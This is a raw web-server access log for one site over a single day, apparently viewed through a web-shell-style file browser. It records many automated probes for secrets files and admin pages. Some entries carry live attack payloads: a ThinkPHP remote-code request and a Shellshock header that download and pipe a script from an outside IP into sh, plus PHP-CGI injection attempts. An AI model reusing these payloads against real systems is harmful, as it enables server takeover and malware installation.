HEX
Server: Apache
System: Linux msm5694.mjhst.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User: camjab_ssh (1000)
PHP: 5.3.29
Disabled: NONE
Upload Files
File: //home/httpd/logs/crackedtube.com_access_log.4
78.153.140.203 - - [26/Jan/2026:04:08:50 -0500] "GET /.env HTTP/1.1" 404 266 "-" "Dalvik/2.1.0 (Linux; U; Android 6.0.1; SAMSUNG-SM-T377A Build/MMB29K)"
78.153.140.203 - - [26/Jan/2026:04:08:50 -0500] "GET /admin/.env HTTP/1.1" 404 272 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:38.0) Gecko/20100101 Firefox/38.0"
78.153.140.203 - - [26/Jan/2026:04:08:51 -0500] "GET /api/.env HTTP/1.1" 404 270 "-" "Opera/6.05 (Windows 2000; U)  [de]"
78.153.140.203 - - [26/Jan/2026:04:08:52 -0500] "GET /app/.env HTTP/1.1" 404 270 "-" "Mozilla/5.0 (Linux; U; Android 4.3; it-it; GT-I9300 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
78.153.140.203 - - [26/Jan/2026:04:08:52 -0500] "GET /backend/.env HTTP/1.1" 404 274 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36 OPR/44.0.2510.1449"
78.153.140.203 - - [26/Jan/2026:04:08:52 -0500] "GET /demo/.env HTTP/1.1" 404 271 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; MALNJS; rv:11.0) like Gecko"
78.153.140.203 - - [26/Jan/2026:04:08:53 -0500] "GET /dev/.env HTTP/1.1" 404 270 "-" "Mozilla/5.0 (iPad; CPU OS 10_3_3 like Mac OS X) AppleWebKit/603.3.8 (KHTML, like Gecko) Version/10.0 Mobile/14G60 Safari/602.1"
78.153.140.203 - - [26/Jan/2026:04:08:54 -0500] "GET /staging/.env HTTP/1.1" 404 274 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.98 Safari/537.36 OPR/44.0.2510.857"
78.153.140.203 - - [26/Jan/2026:04:08:54 -0500] "GET /mail/.env HTTP/1.1" 404 271 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-US) AppleWebKit/530.9 (KHTML, like Gecko) Chrome/ Safari/530.9"
78.153.140.203 - - [26/Jan/2026:04:08:55 -0500] "GET /m/.env HTTP/1.1" 404 268 "-" "Mozilla/5.0 (iPad; CPU OS 9_3 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E5191d Safari/601.1"
78.153.140.203 - - [26/Jan/2026:04:08:55 -0500] "GET /remote/.env HTTP/1.1" 404 273 "-" "Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; HUAWEI Y330-U01 Build/HuaweiY330-U01) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
78.153.140.203 - - [26/Jan/2026:04:08:55 -0500] "GET /webmail/.env HTTP/1.1" 404 274 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr-fr) AppleWebKit/312.8 (KHTML, like Gecko) Safari/312.6"
78.153.140.203 - - [26/Jan/2026:04:08:56 -0500] "GET /server/.env HTTP/1.1" 404 273 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0"
78.153.140.203 - - [26/Jan/2026:04:08:56 -0500] "GET /vpn/.env HTTP/1.1" 404 270 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; yie9)"
78.153.140.203 - - [26/Jan/2026:04:08:56 -0500] "GET /secure/.env HTTP/1.1" 404 273 "-" "Opera/9.80 (Linux mips; ) Presto/2.12.407 Version/12.51 MB97/0.45.23.11 (JVC, Mxl661236_, wireless) VSTVB_MB97  SmartTvA/3.0.0"
78.153.140.203 - - [26/Jan/2026:04:08:57 -0500] "GET /shop/.env HTTP/1.1" 404 271 "-" "Mozilla/5.0 (Linux; U; Android 2.3.5; en-nz; GT-S5570 Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"
78.153.140.203 - - [26/Jan/2026:04:08:57 -0500] "GET /cloud/.env HTTP/1.1" 404 272 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.4 (KHTML, like Gecko) Chrome/4.0.241.0 Safari/532.4"
78.153.140.203 - - [26/Jan/2026:04:08:57 -0500] "GET /portal/.env HTTP/1.1" 404 273 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E)"
78.153.140.203 - - [26/Jan/2026:04:08:58 -0500] "GET /host/.env HTTP/1.1" 404 271 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/19.77.34.5 Safari/537.1"
78.153.140.203 - - [26/Jan/2026:04:08:58 -0500] "GET /support/.env HTTP/1.1" 404 274 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr-FR) AppleWebKit/523.15 (KHTML, like Gecko) Version/3.0 Safari/523.15"
78.153.140.203 - - [26/Jan/2026:04:08:58 -0500] "GET /pop/.env HTTP/1.1" 404 270 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.12) Gecko/20080214 Firefox/2.0.0.12"
78.153.140.203 - - [26/Jan/2026:04:09:00 -0500] "GET /store/.env HTTP/1.1" 404 272 "-" "Mozilla/5.0 (Linux; Android 4.4.2; SPH-L720T Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.117 Mobile Safari/537.36"
78.153.140.203 - - [26/Jan/2026:04:09:00 -0500] "GET /cdn/.env HTTP/1.1" 404 270 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041204 Firefox/1.0 (Debian package 1.0.x.2-1)"
78.153.140.203 - - [26/Jan/2026:04:09:00 -0500] "GET /dashboard/.env HTTP/1.1" 404 276 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/534.1+ (KHTML, like Gecko) Version/5.0 Safari/533.16"
78.153.140.203 - - [26/Jan/2026:04:09:01 -0500] "GET /test/.env HTTP/1.1" 404 271 "-" "Dalvik/1.6.0 (Linux; U; Android 4.2.2; GT-P5110 Build/JDQ39)"
78.153.140.203 - - [26/Jan/2026:04:09:01 -0500] "GET /smtp/.env HTTP/1.1" 404 271 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; BOIE9;ENUSMSE)"
78.153.140.203 - - [26/Jan/2026:04:09:02 -0500] "GET /ftp/.env HTTP/1.1" 404 270 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; 360SE)"
78.153.140.203 - - [26/Jan/2026:04:09:02 -0500] "GET /wiki/.env HTTP/1.1" 404 271 "-" "Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.0.7) Gecko/2009030620 Gentoo Firefox/3.0.7"
78.153.140.203 - - [26/Jan/2026:04:09:02 -0500] "GET /help/.env HTTP/1.1" 404 271 "-" "Mozilla/5.0 (Linux; U; Android 4.2.2; es-mx; ONE TOUCH 4033A Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.2 Mobile Safari/534.30"
78.153.140.203 - - [26/Jan/2026:04:09:03 -0500] "GET /blog/.env HTTP/1.1" 404 271 "-" "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.1) Gecko/20060313 Fedora/1.5.0.1-9 Firefox/1.5.0.1 pango-text Mnenhy/0.7.3.0"
204.76.203.212 - - [26/Jan/2026:04:17:42 -0500] "GET / HTTP/1.1" 403 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
93.174.93.12 - - [26/Jan/2026:04:28:22 -0500] "GET / HTTP/1.1" 403 271 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7"
119.28.177.175 - - [26/Jan/2026:04:34:35 -0500] "GET / HTTP/1.1" 403 266 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
180.242.71.221 - - [26/Jan/2026:04:36:09 -0500] "GET / HTTP/1.1" 403 266 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
204.76.203.212 - - [26/Jan/2026:04:44:21 -0500] "GET / HTTP/1.1" 403 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
34.19.199.43 - - [26/Jan/2026:04:54:20 -0500] "OPTIONS / HTTP/1.1" 200 - "-" "-"
204.76.203.212 - - [26/Jan/2026:05:08:13 -0500] "GET / HTTP/1.1" 403 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
71.6.232.24 - - [26/Jan/2026:05:14:19 -0500] "GET / HTTP/1.1" 403 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
204.76.203.212 - - [26/Jan/2026:05:33:18 -0500] "GET / HTTP/1.1" 403 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
35.203.210.101 - - [26/Jan/2026:05:54:45 -0500] "GET / HTTP/1.1" 403 266 "-" "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity"
204.76.203.212 - - [26/Jan/2026:05:58:08 -0500] "GET / HTTP/1.1" 403 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
195.177.94.227 - - [26/Jan/2026:06:02:56 -0500] "GET / HTTP/1.1" 403 266 "-" "-"
5.61.209.92 - - [26/Jan/2026:06:13:40 -0500] "GET /SDK/webLanguage HTTP/1.1" 404 277 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
148.153.56.58 - - [26/Jan/2026:06:14:51 -0500] "GET /4nmM HTTP/1.1" 404 266 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0"
148.153.56.58 - - [26/Jan/2026:06:14:52 -0500] "GET /nW2f HTTP/1.1" 404 266 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0"
148.153.56.58 - - [26/Jan/2026:06:14:52 -0500] "GET /aab8 HTTP/1.1" 404 266 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0"
148.153.56.58 - - [26/Jan/2026:06:14:52 -0500] "GET /aab9 HTTP/1.1" 404 266 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0"
192.142.25.95 - - [26/Jan/2026:06:14:54 -0500] "GET / HTTP/1.1" 403 267 "-" "-"
182.44.67.97 - - [26/Jan/2026:06:19:08 -0500] "GET / HTTP/1.1" 403 271 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
204.76.203.212 - - [26/Jan/2026:06:24:11 -0500] "GET / HTTP/1.1" 403 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
43.157.38.131 - - [26/Jan/2026:06:46:05 -0500] "GET / HTTP/1.1" 403 271 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
204.76.203.212 - - [26/Jan/2026:06:49:44 -0500] "GET / HTTP/1.1" 403 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
110.177.183.117 - - [26/Jan/2026:06:52:04 -0500] "GET / HTTP/1.1" 403 266 "-" "-"
171.34.168.69 - - [26/Jan/2026:06:52:07 -0500] "GET / HTTP/1.1" 403 266 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"
204.76.203.212 - - [26/Jan/2026:07:13:41 -0500] "GET / HTTP/1.1" 403 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
193.142.147.209 - - [26/Jan/2026:07:18:01 -0500] "POST / HTTP/1.1" 404 262 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
192.159.99.169 - - [26/Jan/2026:07:18:13 -0500] "GET /.env HTTP/1.1" 404 266 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
192.159.99.169 - - [26/Jan/2026:07:18:13 -0500] "GET /wp-content/ HTTP/1.1" 404 273 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
204.76.203.212 - - [26/Jan/2026:07:39:52 -0500] "GET / HTTP/1.1" 403 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
43.133.69.37 - - [26/Jan/2026:07:45:31 -0500] "GET / HTTP/1.1" 403 267 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
8.222.239.103 - - [26/Jan/2026:08:01:14 -0500] "GET / HTTP/1.1" 403 267 "-" "curl/7.78.0"
204.76.203.212 - - [26/Jan/2026:08:04:13 -0500] "GET / HTTP/1.1" 403 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
66.249.66.160 - - [26/Jan/2026:08:04:48 -0500] "GET /robots.txt HTTP/1.1" 404 273 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
43.130.72.177 - - [26/Jan/2026:08:18:33 -0500] "GET / HTTP/1.1" 403 266 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
204.76.203.212 - - [26/Jan/2026:08:30:51 -0500] "GET / HTTP/1.1" 403 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
63.178.104.151 - - [26/Jan/2026:08:38:56 -0500] "GET / HTTP/1.1" 403 266 "-" "Go-http-client/1.1"
216.180.246.206 - - [26/Jan/2026:08:43:58 -0500] "GET / HTTP/1.1" 403 271 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
216.180.246.206 - - [26/Jan/2026:08:44:34 -0500] "GET / HTTP/1.1" 403 266 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
216.180.246.206 - - [26/Jan/2026:08:45:04 -0500] "GET /manage/account/login HTTP/1.1" 404 282 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
216.180.246.206 - - [26/Jan/2026:08:45:19 -0500] "GET /admin/index.html HTTP/1.1" 404 278 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
216.180.246.206 - - [26/Jan/2026:08:45:43 -0500] "GET /index.html HTTP/1.1" 404 272 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
216.180.246.206 - - [26/Jan/2026:08:45:58 -0500] "GET /+CSCOE+/logon.html HTTP/1.1" 404 280 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
216.180.246.206 - - [26/Jan/2026:08:46:12 -0500] "GET /cgi-bin/login.cgi HTTP/1.1" 404 279 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
216.180.246.206 - - [26/Jan/2026:08:46:27 -0500] "GET /login.htm HTTP/1.1" 404 271 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
216.180.246.206 - - [26/Jan/2026:08:46:50 -0500] "GET /login.html HTTP/1.1" 404 272 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
216.180.246.206 - - [26/Jan/2026:08:47:05 -0500] "GET /login.jsp HTTP/1.1" 404 271 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
216.180.246.206 - - [26/Jan/2026:08:47:28 -0500] "GET /login HTTP/1.1" 404 267 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
216.180.246.206 - - [26/Jan/2026:08:47:51 -0500] "GET /doc/index.html HTTP/1.1" 404 276 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
216.180.246.206 - - [26/Jan/2026:08:48:11 -0500] "GET /remote/login HTTP/1.1" 404 274 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
216.180.246.206 - - [26/Jan/2026:08:48:34 -0500] "GET //admin/login.asp HTTP/1.1" 404 277 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
216.180.246.206 - - [26/Jan/2026:08:48:58 -0500] "GET /web/ HTTP/1.1" 404 266 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
216.180.246.206 - - [26/Jan/2026:08:49:22 -0500] "GET //webpages/login.html HTTP/1.1" 404 281 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
204.76.203.212 - - [26/Jan/2026:08:55:47 -0500] "GET / HTTP/1.1" 403 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
192.159.99.95 - - [26/Jan/2026:09:05:16 -0500] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (rondo2012@atomicmail.io)"
192.159.99.95 - - [26/Jan/2026:09:05:16 -0500] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=%28wget%20-qO-%20http%3A%2F%2F41.231.37.153%2Frondo.dtm.sh%3F%3D%5C7eedeb2b%7C%7Cbusybox%20wget%20-qO-%20http%3A%2F%2F41.231.37.153%2Frondo.dtm.sh%3F%3D%5C7eedeb2b%7C%7Ccurl%20-s%20http%3A%2F%2F41.231.37.153%2Frondo.dtm.sh%3F%3D%5C7eedeb2b%29%7Csh HTTP/1.1" 404 271 "-" "Mozilla/5.0 (rondo2012@atomicmail.io)"
192.159.99.95 - - [26/Jan/2026:09:05:16 -0500] "POST /index.php?s=captcha HTTP/1.1" 404 271 "-" "Mozilla/5.0 (rondo2012@atomicmail.io)"
192.159.99.95 - - [26/Jan/2026:09:05:16 -0500] "GET / HTTP/1.1" 403 266 "-" "() { :; }; /bin/bash -c \"(wget -qO- http://41.231.37.153/rondo.qre.sh?=\\7eedeb2b||busybox wget -qO- http://41.231.37.153/rondo.qre.sh?=\\7eedeb2b||curl -s http://41.231.37.153/rondo.qre.sh?=\\7eedeb2b)|sh\"& # rondo2012@atomicmail.io"
71.6.146.185 - - [26/Jan/2026:09:07:44 -0500] "GET / HTTP/1.1" 403 266 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
71.6.146.185 - - [26/Jan/2026:09:07:44 -0500] "GET /robots.txt HTTP/1.1" 404 272 "-" "-"
71.6.146.185 - - [26/Jan/2026:09:07:46 -0500] "GET /.well-known/security.txt HTTP/1.1" 404 286 "-" "-"
204.76.203.212 - - [26/Jan/2026:09:21:17 -0500] "GET / HTTP/1.1" 403 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
66.249.66.3 - - [26/Jan/2026:09:22:50 -0500] "GET /robots.txt HTTP/1.1" 404 277 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
193.142.147.209 - - [26/Jan/2026:09:39:38 -0500] "POST / HTTP/1.1" 404 262 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
204.76.203.212 - - [26/Jan/2026:09:44:15 -0500] "GET / HTTP/1.1" 403 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
204.76.203.212 - - [26/Jan/2026:10:12:43 -0500] "GET / HTTP/1.1" 403 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
195.178.110.109 - - [26/Jan/2026:10:26:36 -0500] "GET /.git/config HTTP/1.1" 404 274 "-" "Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0"
195.178.110.109 - - [26/Jan/2026:10:26:39 -0500] "GET / HTTP/1.1" 403 267 "-" "-"
109.71.252.97 - - [26/Jan/2026:10:32:20 -0500] "GET / HTTP/1.1" 403 267 "crackedtube.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
204.76.203.212 - - [26/Jan/2026:10:36:05 -0500] "GET / HTTP/1.1" 403 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
35.205.235.254 - - [26/Jan/2026:10:37:29 -0500] "GET / HTTP/1.1" 403 266 "-" "python-requests/2.32.5"
35.216.144.195 - - [26/Jan/2026:10:41:25 -0500] "GET / HTTP/1.1" 403 266 "-" "Mozilla/5.0"
52.52.66.55 - - [26/Jan/2026:10:55:10 -0500] "GET / HTTP/1.1" 403 266 "-" "Go-http-client/1.1"
204.76.203.212 - - [26/Jan/2026:11:02:02 -0500] "GET / HTTP/1.1" 403 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
87.121.84.51 - - [26/Jan/2026:11:23:58 -0500] "GET / HTTP/1.1" 403 266 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0"
204.76.203.212 - - [26/Jan/2026:11:28:43 -0500] "GET / HTTP/1.1" 403 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
43.153.27.244 - - [26/Jan/2026:11:36:00 -0500] "GET / HTTP/1.1" 403 266 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
204.76.203.212 - - [26/Jan/2026:11:54:23 -0500] "GET / HTTP/1.1" 403 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
5.183.209.196 - - [26/Jan/2026:11:59:54 -0500] "GET /SDK/webLanguage HTTP/1.1" 404 277 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
193.142.147.209 - - [26/Jan/2026:12:04:05 -0500] "POST / HTTP/1.1" 404 262 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
117.55.202.152 - - [26/Jan/2026:12:04:11 -0500] "GET / HTTP/1.1" 403 266 "-" "Python/3.12 aiohttp/3.13.3"
204.76.203.212 - - [26/Jan/2026:12:16:18 -0500] "GET / HTTP/1.1" 403 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
34.201.52.155 - - [26/Jan/2026:12:34:53 -0500] "GET / HTTP/1.1" 403 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
204.76.203.212 - - [26/Jan/2026:12:40:49 -0500] "GET / HTTP/1.1" 403 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
87.121.84.125 - - [26/Jan/2026:12:45:25 -0500] "GET /wp-content.php HTTP/1.1" 404 277 "-" "ALittle Client"
44.252.49.36 - - [26/Jan/2026:12:55:37 -0500] "GET / HTTP/1.1" 403 267 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
204.76.203.6 - - [26/Jan/2026:12:58:28 -0500] "GET /SDK/webLanguage HTTP/1.1" 404 277 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
182.42.104.32 - - [26/Jan/2026:13:03:16 -0500] "GET / HTTP/1.1" 403 267 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
204.76.203.212 - - [26/Jan/2026:13:09:38 -0500] "GET / HTTP/1.1" 403 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
192.142.25.95 - - [26/Jan/2026:13:29:14 -0500] "GET / HTTP/1.1" 403 267 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
204.76.203.212 - - [26/Jan/2026:13:34:23 -0500] "GET / HTTP/1.1" 403 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
24.65.233.27 - - [26/Jan/2026:13:40:47 -0500] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 273 "-" "libredtail-http"
24.65.233.27 - - [26/Jan/2026:13:40:50 -0500] "POST /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 262 "-" "libredtail-http"
24.65.233.27 - - [26/Jan/2026:13:40:52 -0500] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 312 "-" "libredtail-http"
